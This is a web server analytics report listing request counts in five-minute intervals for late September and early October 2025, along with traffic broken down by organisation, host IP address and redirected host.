30/Sep/25 21:15–21:20 | 106 | 68 | ![]() ![]() ![]() |
30/Sep/25 21:20–21:25 | 116 | 68 | ![]() ![]() ![]() |
30/Sep/25 21:25–21:30 | 74 | 36 | ![]() |
30/Sep/25 21:30–21:35 | 84 | 60 | ![]() ![]() |
30/Sep/25 21:35–21:40 | 88 | 42 | ![]() ![]() |
30/Sep/25 21:40–21:45 | 96 | 60 | ![]() ![]() |
30/Sep/25 21:45–21:50 | 170 | 42 | ![]() ![]() |
30/Sep/25 21:50–21:55 | 104 | 48 | ![]() ![]() |
30/Sep/25 21:55–22:00 | 108 | 40 | ![]() |
30/Sep/25 22:00–22:05 | 96 | 54 | ![]() ![]() ![]() |
30/Sep/25 22:05–22:10 | 104 | 62 | ![]() ![]() ![]() |
30/Sep/25 22:10–22:15 | 102 | 42 | ![]() ![]() |
30/Sep/25 22:15–22:20 | 106 | 46 | ![]() ![]() |
30/Sep/25 22:20–22:25 | 96 | 48 | ![]() ![]() |
30/Sep/25 22:25–22:30 | 108 | 52 | ![]() ![]() ![]() |
30/Sep/25 22:30–22:35 | 106 | 46 | ![]() ![]() |
30/Sep/25 22:35–22:40 | 180 | 78 | ![]() |
30/Sep/25 22:40–22:45 | 122 | 64 | ![]() ![]() ![]() |
30/Sep/25 22:45–22:50 | 112 | 42 | ![]() ![]() |
30/Sep/25 22:50–22:55 | 112 | 36 | ![]() |
30/Sep/25 22:55–23:00 | 106 | 58 | ![]() ![]() |
30/Sep/25 23:00–23:05 | 118 | 88 | ![]() ![]() |
30/Sep/25 23:05–23:10 | 104 | 80 | ![]() |
30/Sep/25 23:10–23:15 | 114 | 78 | ![]() |
30/Sep/25 23:15–23:20 | 94 | 68 | ![]() ![]() ![]() |
30/Sep/25 23:20–23:25 | 106 | 80 | ![]() |
30/Sep/25 23:25–23:30 | 92 | 66 | ![]() ![]() ![]() |
30/Sep/25 23:30–23:35 | 104 | 70 | ![]() ![]() ![]() |
30/Sep/25 23:35–23:40 | 102 | 66 | ![]() ![]() ![]() |
30/Sep/25 23:40–23:45 | 94 | 66 | ![]() ![]() ![]() |
30/Sep/25 23:45–23:50 | 112 | 74 | ![]() ![]() ![]() ![]() |
30/Sep/25 23:50–23:55 | 92 | 74 | ![]() ![]() ![]() ![]() |
30/Sep/25 23:55–24:00 | 92 | 62 | ![]() ![]() ![]() |
1/Oct/25 00:00–00:05 | 106 | 80 | ![]() |
1/Oct/25 00:05–00:10 | 86 | 60 | ![]() ![]() |
1/Oct/25 00:10–00:15 | 108 | 82 | ![]() ![]() |
1/Oct/25 00:15–00:20 | 82 | 44 | ![]() ![]() |
1/Oct/25 00:20–00:25 | 78 | 48 | ![]() ![]() |
1/Oct/25 00:25–00:30 | 60 | 40 | ![]() |
1/Oct/25 00:30–00:35 | 60 | 42 | ![]() ![]() |
1/Oct/25 00:35–00:40 | 74 | 38 | ![]() |
1/Oct/25 00:40–00:45 | 68 | 40 | ![]() |
1/Oct/25 00:45–00:50 | 74 | 34 | ![]() ![]() ![]() |
1/Oct/25 00:50–00:55 | 68 | 38 | ![]() |
1/Oct/25 00:55–01:00 | 60 | 28 | ![]() ![]() |
1/Oct/25 01:00–01:05 | 64 | 38 | ![]() |
1/Oct/25 01:05–01:10 | 52 | 26 | ![]() ![]() |
1/Oct/25 01:10–01:15 | 80 | 44 | ![]() ![]() |
1/Oct/25 01:15–01:20 | 86 | 44 | ![]() ![]() |
1/Oct/25 01:20–01:25 | 74 | 36 | ![]() |
1/Oct/25 01:25–01:30 | 82 | 42 | ![]() ![]() |
1/Oct/25 01:30–01:35 | 64 | 42 | ![]() ![]() |
1/Oct/25 01:35–01:40 | 70 | 40 | ![]() |
1/Oct/25 01:40–01:45 | 58 | 28 | ![]() ![]() |
1/Oct/25 01:45–01:50 | 64 | 32 | ![]() ![]() ![]() |
1/Oct/25 01:50–01:55 | 66 | 34 | ![]() ![]() ![]() |
1/Oct/25 01:55–02:00 | 62 | 48 | ![]() ![]() |
1/Oct/25 02:00–02:05 | 52 | 32 | ![]() ![]() ![]() |
1/Oct/25 02:05–02:10 | 58 | 28 | ![]() ![]() |
1/Oct/25 02:10–02:15 | 152 | 48 | ![]() ![]() |
1/Oct/25 02:15–02:20 | 68 | 34 | ![]() ![]() ![]() |
1/Oct/25 02:20–02:25 | 20 | 14 | ![]() ![]() |
Busiest five minutes: 14/Sep/25 15:25–15:30 (1,374 requests for pages).
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the total activity for each five-minute period of the day, summed over all the days in the report.
Each unit () represents 80 requests for pages or part thereof.
time | reqs | pages | |
---|---|---|---|
00:00–00:05 | 2183 | 1198 | ![]() ![]() ![]() ![]() |
00:05–00:10 | 2116 | 1036 | ![]() ![]() ![]() |
00:10–00:15 | 1930 | 1148 | ![]() ![]() ![]() ![]() |
00:15–00:20 | 1896 | 1063 | ![]() ![]() ![]() |
00:20–00:25 | 1879 | 1158 | ![]() ![]() ![]() ![]() |
00:25–00:30 | 1838 | 999 | ![]() ![]() ![]() |
00:30–00:35 | 1630 | 1052 | ![]() ![]() ![]() |
00:35–00:40 | 2050 | 1120 | ![]() ![]() ![]() |
00:40–00:45 | 2320 | 1232 | ![]() |
00:45–00:50 | 2040 | 1274 | ![]() |
00:50–00:55 | 1924 | 1094 | ![]() ![]() ![]() |
00:55–01:00 | 1918 | 1087 | ![]() ![]() ![]() |
01:00–01:05 | 2057 | 1236 | ![]() |
01:05–01:10 | 2060 | 1171 | ![]() ![]() ![]() ![]() |
01:10–01:15 | 1928 | 1057 | ![]() ![]() ![]() |
01:15–01:20 | 1940 | 1051 | ![]() ![]() ![]() |
01:20–01:25 | 1945 | 1084 | ![]() ![]() ![]() |
01:25–01:30 | 2006 | 1076 | ![]() ![]() ![]() |
01:30–01:35 | 1732 | 1017 | ![]() ![]() ![]() |
01:35–01:40 | 1902 | 1015 | ![]() ![]() ![]() |
01:40–01:45 | 2034 | 1061 | ![]() ![]() ![]() |
01:45–01:50 | 2118 | 1107 | ![]() ![]() ![]() |
01:50–01:55 | 2062 | 1106 | ![]() ![]() ![]() |
01:55–02:00 | 1943 | 1117 | ![]() ![]() ![]() |
02:00–02:05 | 2048 | 1150 | ![]() ![]() ![]() ![]() |
02:05–02:10 | 2128 | 1207 | ![]() |
02:10–02:15 | 2286 | 1117 | ![]() ![]() ![]() |
02:15–02:20 | 2167 | 1048 | ![]() ![]() ![]() |
02:20–02:25 | 2095 | 1050 | ![]() ![]() ![]() |
02:25–02:30 | 1530 | 963 | ![]() ![]() ![]() |
02:30–02:35 | 1714 | 1020 | ![]() ![]() ![]() |
02:35–02:40 | 2092 | 1145 | ![]() ![]() ![]() ![]() |
02:40–02:45 | 2021 | 1093 | ![]() ![]() ![]() |
02:45–02:50 | 1984 | 1153 | ![]() ![]() ![]() ![]() |
02:50–02:55 | 1824 | 1077 | ![]() ![]() ![]() |
02:55–03:00 | 1739 | 1109 | ![]() ![]() ![]() |
03:00–03:05 | 1789 | 1040 | ![]() ![]() ![]() |
03:05–03:10 | 2006 | 1098 | ![]() ![]() ![]() |
03:10–03:15 | 2189 | 1357 | ![]() ![]() |
03:15–03:20 | 1906 | 1177 | ![]() ![]() ![]() ![]() |
03:20–03:25 | 1826 | 1080 | ![]() ![]() ![]() |
03:25–03:30 | 1803 | 1114 | ![]() ![]() ![]() |
03:30–03:35 | 2064 | 1216 | ![]() |
03:35–03:40 | 2344 | 1269 | ![]() |
03:40–03:45 | 2180 | 1157 | ![]() ![]() ![]() ![]() |
03:45–03:50 | 2140 | 1261 | ![]() |
03:50–03:55 | 2005 | 1228 | ![]() |
03:55–04:00 | 2106 | 1271 | ![]() |
04:00–04:05 | 2192 | 1311 | ![]() ![]() |
04:05–04:10 | 2098 | 1235 | ![]() |
04:10–04:15 | 2289 | 1304 | ![]() ![]() |
04:15–04:20 | 2267 | 1363 | ![]() ![]() |
04:20–04:25 | 2197 | 1394 | ![]() ![]() |
04:25–04:30 | 2206 | 1436 | ![]() ![]() |
04:30–04:35 | 2329 | 1464 | ![]() ![]() ![]() |
04:35–04:40 | 2301 | 1557 | ![]() ![]() |
04:40–04:45 | 2298 | 1531 | ![]() ![]() |
04:45–04:50 | 1918 | 1176 | ![]() ![]() ![]() ![]() |
04:50–04:55 | 2405 | 1470 | ![]() ![]() ![]() |
04:55–05:00 | 2452 | 1547 | ![]() ![]() |
05:00–05:05 | 2405 | 1497 | ![]() ![]() ![]() |
05:05–05:10 | 2537 | 1591 | ![]() ![]() |
05:10–05:15 | 2960 | 1698 | ![]() ![]() ![]() |
05:15–05:20 | 2339 | 1568 | ![]() ![]() |
05:20–05:25 | 2231 | 1402 | ![]() ![]() |
05:25–05:30 | 2011 | 1246 | ![]() |
05:30–05:35 | 2031 | 1426 | ![]() ![]() |
05:35–05:40 | 2358 | 1506 | ![]() ![]() ![]() |
05:40–05:45 | 2153 | 1445 | ![]() ![]() ![]() |
05:45–05:50 | 2116 | 1429 | ![]() ![]() |
05:50–05:55 | 2241 | 1531 | ![]() ![]() |
05:55–06:00 | 2231 | 1506 | ![]() ![]() ![]() |
06:00–06:05 | 2428 | 1585 | ![]() ![]() |
06:05–06:10 | 2388 | 1566 | ![]() ![]() |
06:10–06:15 | 2464 | 1603 | ![]() ![]() ![]() |
06:15–06:20 | 2086 | 1385 | ![]() ![]() |
06:20–06:25 | 2028 | 1381 | ![]() ![]() |
06:25–06:30 | 2039 | 1349 | ![]() ![]() |
06:30–06:35 | 2077 | 1390 | ![]() ![]() |
06:35–06:40 | 2140 | 1283 | ![]() ![]() |
06:40–06:45 | 2183 | 1409 | ![]() ![]() |
06:45–06:50 | 2265 | 1435 | ![]() ![]() |
06:50–06:55 | 2260 | 1473 | ![]() ![]() ![]() |
06:55–07:00 | 2658 | 1406 | ![]() ![]() |
07:00–07:05 | 2286 | 1511 | ![]() ![]() ![]() |
07:05–07:10 | 2248 | 1489 | ![]() ![]() ![]() |
07:10–07:15 | 2409 | 1588 | ![]() ![]() |
07:15–07:20 | 2419 | 1559 | ![]() ![]() |
07:20–07:25 | 2238 | 1518 | ![]() ![]() ![]() |
07:25–07:30 | 2254 | 1399 | ![]() ![]() |
07:30–07:35 | 2250 | 1366 | ![]() ![]() |
07:35–07:40 | 2247 | 1364 | ![]() ![]() |
07:40–07:45 | 2169 | 1409 | ![]() ![]() |
07:45–07:50 | 1842 | 1128 | ![]() ![]() ![]() ![]() |
07:50–07:55 | 1700 | 1047 | ![]() ![]() ![]() |
07:55–08:00 | 1672 | 999 | ![]() ![]() ![]() |
08:00–08:05 | 1781 | 1082 | ![]() ![]() ![]() |
08:05–08:10 | 2074 | 1296 | ![]() ![]() |
08:10–08:15 | 1817 | 1069 | ![]() ![]() ![]() |
08:15–08:20 | 1743 | 1075 | ![]() ![]() ![]() |
08:20–08:25 | 2048 | 1101 | ![]() ![]() ![]() |
08:25–08:30 | 1608 | 964 | ![]() ![]() ![]() |
08:30–08:35 | 1646 | 1043 | ![]() ![]() ![]() |
08:35–08:40 | 1815 | 1178 | ![]() ![]() ![]() ![]() |
08:40–08:45 | 1692 | 1057 | ![]() ![]() ![]() |
08:45–08:50 | 1698 | 1148 | ![]() ![]() ![]() ![]() |
08:50–08:55 | 2251 | 1149 | ![]() ![]() ![]() ![]() |
08:55–09:00 | 2042 | 1151 | ![]() ![]() ![]() ![]() |
09:00–09:05 | 2018 | 1269 | ![]() |
09:05–09:10 | 1968 | 1241 | ![]() |
09:10–09:15 | 1982 | 1221 | ![]() |
09:15–09:20 | 2235 | 1364 | ![]() ![]() |
09:20–09:25 | 2706 | 1490 | ![]() ![]() ![]() |
09:25–09:30 | 2375 | 1535 | ![]() ![]() |
09:30–09:35 | 1916 | 1192 | ![]() ![]() ![]() ![]() |
09:35–09:40 | 1906 | 1261 | ![]() |
09:40–09:45 | 2203 | 1264 | ![]() |
09:45–09:50 | 1984 | 1220 | ![]() |
09:50–09:55 | 1922 | 1147 | ![]() ![]() ![]() ![]() |
09:55–10:00 | 1820 | 1188 | ![]() ![]() ![]() ![]() |
10:00–10:05 | 1736 | 1057 | ![]() ![]() ![]() |
10:05–10:10 | 1966 | 1254 | ![]() |
10:10–10:15 | 2091 | 1234 | ![]() |
10:15–10:20 | 2064 | 1195 | ![]() ![]() ![]() ![]() |
10:20–10:25 | 2125 | 1372 | ![]() ![]() |
10:25–10:30 | 1991 | 1287 | ![]() ![]() |
10:30–10:35 | 2000 | 1258 | ![]() |
10:35–10:40 | 1874 | 1176 | ![]() ![]() ![]() ![]() |
10:40–10:45 | 1910 | 1241 | ![]() |
10:45–10:50 | 1999 | 1205 | ![]() |
10:50–10:55 | 1952 | 1222 | ![]() |
10:55–11:00 | 1933 | 1144 | ![]() ![]() ![]() ![]() |
11:00–11:05 | 2070 | 1261 | ![]() |
11:05–11:10 | 1793 | 1158 | ![]() ![]() ![]() ![]() |
11:10–11:15 | 1923 | 1075 | ![]() ![]() ![]() |
11:15–11:20 | 1589 | 1031 | ![]() ![]() ![]() |
11:20–11:25 | 1670 | 982 | ![]() ![]() ![]() |
11:25–11:30 | 1850 | 977 | ![]() ![]() ![]() |
11:30–11:35 | 1858 | 1065 | ![]() ![]() ![]() |
11:35–11:40 | 1813 | 1045 | ![]() ![]() ![]() |
11:40–11:45 | 2095 | 1086 | ![]() ![]() ![]() |
11:45–11:50 | 1965 | 1030 | ![]() ![]() ![]() |
11:50–11:55 | 1866 | 1067 | ![]() ![]() ![]() |
11:55–12:00 | 2021 | 1047 | ![]() ![]() ![]() |
12:00–12:05 | 2015 | 1183 | ![]() ![]() ![]() ![]() |
12:05–12:10 | 2083 | 1129 | ![]() ![]() ![]() ![]() |
12:10–12:15 | 1826 | 952 | ![]() ![]() |
12:15–12:20 | 1920 | 928 | ![]() ![]() |
12:20–12:25 | 1672 | 1005 | ![]() ![]() ![]() |
12:25–12:30 | 1787 | 1021 | ![]() ![]() ![]() |
12:30–12:35 | 1696 | 1105 | ![]() ![]() ![]() |
12:35–12:40 | 1761 | 1040 | ![]() ![]() ![]() |
12:40–12:45 | 1635 | 965 | ![]() ![]() ![]() |
12:45–12:50 | 1637 | 991 | ![]() ![]() ![]() |
12:50–12:55 | 1921 | 1012 | ![]() ![]() ![]() |
12:55–13:00 | 2055 | 1120 | ![]() ![]() ![]() |
13:00–13:05 | 1994 | 1060 | ![]() ![]() ![]() |
13:05–13:10 | 1891 | 1082 | ![]() ![]() ![]() |
13:10–13:15 | 1658 | 972 | ![]() ![]() ![]() |
13:15–13:20 | 1568 | 1038 | ![]() ![]() ![]() |
13:20–13:25 | 1801 | 1066 | ![]() ![]() ![]() |
13:25–13:30 | 1671 | 956 | ![]() ![]() |
13:30–13:35 | 1613 | 929 | ![]() ![]() |
13:35–13:40 | 1655 | 972 | ![]() ![]() ![]() |
13:40–13:45 | 1533 | 950 | ![]() ![]() |
13:45–13:50 | 1662 | 989 | ![]() ![]() ![]() |
13:50–13:55 | 1671 | 998 | ![]() ![]() ![]() |
13:55–14:00 | 1787 | 1019 | ![]() ![]() ![]() |
14:00–14:05 | 1918 | 1089 | ![]() ![]() ![]() |
14:05–14:10 | 1769 | 1011 | ![]() ![]() ![]() |
14:10–14:15 | 1684 | 1003 | ![]() ![]() ![]() |
14:15–14:20 | 1664 | 935 | ![]() ![]() |
14:20–14:25 | 1818 | 1060 | ![]() ![]() ![]() |
14:25–14:30 | 1751 | 1119 | ![]() ![]() ![]() |
14:30–14:35 | 1852 | 1049 | ![]() ![]() ![]() |
14:35–14:40 | 2266 | 1133 | ![]() ![]() ![]() ![]() |
14:40–14:45 | 1935 | 968 | ![]() ![]() ![]() |
14:45–14:50 | 1798 | 1038 | ![]() ![]() ![]() |
14:50–14:55 | 1734 | 1033 | ![]() ![]() ![]() |
14:55–15:00 | 1662 | 1012 | ![]() ![]() ![]() |
15:00–15:05 | 1690 | 948 | ![]() ![]() |
15:05–15:10 | 1834 | 956 | ![]() ![]() |
15:10–15:15 | 1866 | 1006 | ![]() ![]() ![]() |
15:15–15:20 | 2028 | 1144 | ![]() ![]() ![]() ![]() |
15:20–15:25 | 2947 | 1912 | ![]() ![]() |
15:25–15:30 | 3403 | 2351 | ![]() ![]() ![]() ![]() |
15:30–15:35 | 2057 | 1292 | ![]() ![]() |
15:35–15:40 | 1582 | 959 | ![]() ![]() |
15:40–15:45 | 1713 | 1102 | ![]() ![]() ![]() |
15:45–15:50 | 2036 | 1109 | ![]() ![]() ![]() |
15:50–15:55 | 2427 | 1533 | ![]() ![]() |
15:55–16:00 | 2145 | 1440 | ![]() ![]() |
16:00–16:05 | 1765 | 1048 | ![]() ![]() ![]() |
16:05–16:10 | 1783 | 1097 | ![]() ![]() ![]() |
16:10–16:15 | 1746 | 1068 | ![]() ![]() ![]() |
16:15–16:20 | 1829 | 1068 | ![]() ![]() ![]() |
16:20–16:25 | 1814 | 991 | ![]() ![]() ![]() |
16:25–16:30 | 1761 | 1019 | ![]() ![]() ![]() |
16:30–16:35 | 2041 | 1080 | ![]() ![]() ![]() |
16:35–16:40 | 1891 | 996 | ![]() ![]() ![]() |
16:40–16:45 | 1862 | 963 | ![]() ![]() ![]() |
16:45–16:50 | 1474 | 899 | ![]() ![]() |
16:50–16:55 | 1629 | 938 | ![]() ![]() |
16:55–17:00 | 1929 | 1190 | ![]() ![]() ![]() ![]() |
17:00–17:05 | 1987 | 1355 | ![]() ![]() |
17:05–17:10 | 1878 | 1187 | ![]() ![]() ![]() ![]() |
17:10–17:15 | 1829 | 1136 | ![]() ![]() ![]() ![]() |
17:15–17:20 | 2208 | 1418 | ![]() ![]() |
17:20–17:25 | 2553 | 1625 | ![]() ![]() ![]() |
17:25–17:30 | 1959 | 1224 | ![]() |
17:30–17:35 | 1739 | 948 | ![]() ![]() |
17:35–17:40 | 1917 | 982 | ![]() ![]() ![]() |
17:40–17:45 | 1753 | 1014 | ![]() ![]() ![]() |
17:45–17:50 | 1660 | 951 | ![]() ![]() |
17:50–17:55 | 1599 | 975 | ![]() ![]() ![]() |
17:55–18:00 | 1728 | 951 | ![]() ![]() |
18:00–18:05 | 1604 | 980 | ![]() ![]() ![]() |
18:05–18:10 | 1685 | 961 | ![]() ![]() ![]() |
18:10–18:15 | 1602 | 991 | ![]() ![]() ![]() |
18:15–18:20 | 1669 | 1088 | ![]() ![]() ![]() |
18:20–18:25 | 1776 | 1039 | ![]() ![]() ![]() |
18:25–18:30 | 1580 | 933 | ![]() ![]() |
18:30–18:35 | 1724 | 936 | ![]() ![]() |
18:35–18:40 | 1575 | 939 | ![]() ![]() |
18:40–18:45 | 1772 | 940 | ![]() ![]() |
18:45–18:50 | 1879 | 1041 | ![]() ![]() ![]() |
18:50–18:55 | 1756 | 997 | ![]() ![]() ![]() |
18:55–19:00 | 1504 | 985 | ![]() ![]() ![]() |
19:00–19:05 | 1539 | 1000 | ![]() ![]() ![]() |
19:05–19:10 | 1459 | 959 | ![]() ![]() |
19:10–19:15 | 1594 | 984 | ![]() ![]() ![]() |
19:15–19:20 | 1805 | 991 | ![]() ![]() ![]() |
19:20–19:25 | 1669 | 961 | ![]() ![]() ![]() |
19:25–19:30 | 1663 | 1032 | ![]() ![]() ![]() |
19:30–19:35 | 1754 | 1038 | ![]() ![]() ![]() |
19:35–19:40 | 2002 | 964 | ![]() ![]() ![]() |
19:40–19:45 | 1930 | 957 | ![]() ![]() |
19:45–19:50 | 1897 | 1136 | ![]() ![]() ![]() ![]() |
19:50–19:55 | 2002 | 1092 | ![]() ![]() ![]() |
19:55–20:00 | 1811 | 1109 | ![]() ![]() ![]() |
20:00–20:05 | 1649 | 960 | ![]() ![]() |
20:05–20:10 | 1707 | 1007 | ![]() ![]() ![]() |
20:10–20:15 | 1995 | 1213 | ![]() |
20:15–20:20 | 1998 | 1224 | ![]() |
20:20–20:25 | 1864 | 1032 | ![]() ![]() ![]() |
20:25–20:30 | 2434 | 1043 | ![]() ![]() ![]() |
20:30–20:35 | 1927 | 956 | ![]() ![]() |
20:35–20:40 | 1632 | 921 | ![]() ![]() |
20:40–20:45 | 1708 | 1038 | ![]() ![]() ![]() |
20:45–20:50 | 1996 | 1087 | ![]() ![]() ![]() |
20:50–20:55 | 1789 | 1053 | ![]() ![]() ![]() |
20:55–21:00 | 1607 | 888 | ![]() ![]() |
21:00–21:05 | 1702 | 914 | ![]() ![]() |
21:05–21:10 | 1502 | 892 | ![]() ![]() |
21:10–21:15 | 1514 | 862 | ![]() ![]() ![]() |
21:15–21:20 | 1609 | 922 | ![]() ![]() |
21:20–21:25 | 1730 | 996 | ![]() ![]() ![]() |
21:25–21:30 | 1546 | 908 | ![]() ![]() |
21:30–21:35 | 1431 | 857 | ![]() ![]() ![]() |
21:35–21:40 | 1502 | 880 | ![]() ![]() ![]() |
21:40–21:45 | 1711 | 954 | ![]() ![]() |
21:45–21:50 | 1866 | 935 | ![]() ![]() |
21:50–21:55 | 1797 | 979 | ![]() ![]() ![]() |
21:55–22:00 | 1790 | 946 | ![]() ![]() |
22:00–22:05 | 1803 | 936 | ![]() ![]() |
22:05–22:10 | 1501 | 901 | ![]() ![]() |
22:10–22:15 | 1975 | 980 | ![]() ![]() ![]() |
22:15–22:20 | 1750 | 926 | ![]() ![]() |
22:20–22:25 | 2102 | 1115 | ![]() ![]() ![]() |
22:25–22:30 | 1988 | 1100 | ![]() ![]() ![]() |
22:30–22:35 | 1656 | 1065 | ![]() ![]() ![]() |
22:35–22:40 | 2183 | 1418 | ![]() ![]() |
22:40–22:45 | 1851 | 1130 | ![]() ![]() ![]() ![]() |
22:45–22:50 | 1823 | 1078 | ![]() ![]() ![]() |
22:50–22:55 | 2006 | 1202 | ![]() |
22:55–23:00 | 1965 | 1076 | ![]() ![]() ![]() |
23:00–23:05 | 1728 | 1025 | ![]() ![]() ![]() |
23:05–23:10 | 1770 | 1003 | ![]() ![]() ![]() |
23:10–23:15 | 1845 | 1037 | ![]() ![]() ![]() |
23:15–23:20 | 1843 | 1058 | ![]() ![]() ![]() |
23:20–23:25 | 1977 | 1164 | ![]() ![]() ![]() ![]() |
23:25–23:30 | 2162 | 1173 | ![]() ![]() ![]() ![]() |
23:30–23:35 | 2198 | 1302 | ![]() ![]() |
23:35–23:40 | 1916 | 1133 | ![]() ![]() ![]() ![]() |
23:40–23:45 | 1754 | 1094 | ![]() ![]() ![]() |
23:45–23:50 | 2107 | 1123 | ![]() ![]() ![]() ![]() |
23:50–23:55 | 1849 | 1093 | ![]() ![]() ![]() |
23:55–24:00 | 1915 | 1140 | ![]() ![]() ![]() ![]() |
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the countries of the computers which requested files.
Listing domains, sorted by the amount of traffic.
reqs | %bytes | domain |
---|---|---|
559505 | 100% | [unresolved numerical addresses] |
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the organisations of the computers which requested files.
Listing the top 20 organisations by the number of requests, sorted by the number of requests.
reqs | %bytes | organisation |
---|---|---|
152585 | 28.36% | 185.191 |
148041 | 27.48% | 85 |
71097 | 8.11% | 20 |
13868 | 1.19% | 114 |
12528 | 3.58% | 216.73 |
7821 | 0.58% | 217.113 |
6449 | 0.95% | 43 |
6411 | 0.32% | 91 |
6259 | 0.66% | 54 |
6192 | 0.54% | 47 |
5850 | 5.51% | 216.244 |
5188 | 0.82% | 125 |
4629 | 0.21% | 34 |
4214 | 0.25% | 52 |
3804 | 0.67% | 51 |
3505 | 0.24% | 66.249 |
3127 | 0.17% | 3 |
2989 | 2.52% | 57 |
2177 | 0.49% | 45 |
2162 | 0.41% | 95 |
90609 | 16.94% | [not listed: 1,926 organisations] |
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the computers which requested files.
Listing the top 50 hosts by the number of requests, sorted alphabetically.
reqs | %bytes | host |
---|---|---|
2747 | 0.28% | 20.171.207.2 |
3892 | 0.23% | 20.171.207.16 |
3202 | 0.18% | 20.171.207.19 |
20541 | 2.94% | 20.171.207.177 |
2374 | 0.26% | 20.171.207.189 |
27502 | 3.54% | 20.171.207.240 |
7143 | 1.31% | 85.208.96.193 |
6742 | 1.26% | 85.208.96.194 |
7231 | 1.36% | 85.208.96.195 |
6945 | 1.28% | 85.208.96.196 |
6947 | 1.31% | 85.208.96.197 |
7080 | 1.30% | 85.208.96.198 |
7314 | 1.34% | 85.208.96.199 |
8313 | 1.57% | 85.208.96.200 |
7004 | 1.30% | 85.208.96.201 |
6959 | 1.31% | 85.208.96.202 |
6623 | 1.21% | 85.208.96.203 |
6434 | 1.17% | 85.208.96.204 |
6472 | 1.20% | 85.208.96.205 |
10098 | 1.87% | 85.208.96.206 |
7774 | 1.44% | 85.208.96.207 |
7511 | 1.38% | 85.208.96.208 |
7520 | 1.39% | 85.208.96.209 |
10524 | 1.97% | 85.208.96.210 |
6682 | 1.25% | 85.208.96.211 |
6457 | 1.20% | 85.208.96.212 |
5269 | 91.225.160.193 | |
1776 | 0.15% | 114.119.149.171 |
5149 | 0.82% | 125.228.216.16 |
7032 | 1.29% | 185.191.171.1 |
7146 | 1.32% | 185.191.171.2 |
7181 | 1.33% | 185.191.171.3 |
6925 | 1.28% | 185.191.171.4 |
7031 | 1.31% | 185.191.171.5 |
7486 | 1.39% | 185.191.171.6 |
7317 | 1.34% | 185.191.171.7 |
7395 | 1.37% | 185.191.171.8 |
7471 | 1.41% | 185.191.171.9 |
7438 | 1.35% | 185.191.171.10 |
9905 | 1.85% | 185.191.171.11 |
10146 | 1.88% | 185.191.171.12 |
9620 | 1.81% | 185.191.171.13 |
11498 | 2.14% | 185.191.171.14 |
9308 | 1.77% | 185.191.171.15 |
9875 | 1.86% | 185.191.171.16 |
6834 | 1.27% | 185.191.171.17 |
5931 | 1.09% | 185.191.171.18 |
7019 | 1.30% | 185.191.171.19 |
9409 | 1.29% | 216.73.216.19 |
5643 | 5.51% | 216.244.66.240 |
171670 | 29.02% | [not listed: 21,696 hosts] |
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the computers which were redirected to another file.
Listing the top 20 hosts by the number of redirected requests, sorted by the number of redirected requests.
reqs | host |
---|---|
8312 | 20.171.207.240 |
5034 | 91.225.160.193 |
3005 | 20.171.207.189 |
2922 | 185.191.171.14 |
2761 | 85.208.96.210 |
2752 | 85.208.96.206 |
2714 | 185.191.171.11 |
2661 | 185.191.171.13 |
2589 | 185.191.171.16 |
2561 | 185.191.171.12 |
2558 | 185.191.171.15 |
2430 | 85.208.96.200 |
2251 | 10.14.0.6 |
2124 | 185.191.171.7 |
2116 | 85.208.96.209 |
2100 | 85.208.96.207 |
2098 | 85.208.96.198 |
2086 | 185.191.171.6 |
2082 | 85.208.96.195 |
2078 | 85.208.96.199 |
98109 | [not listed: 9,666 hosts] |
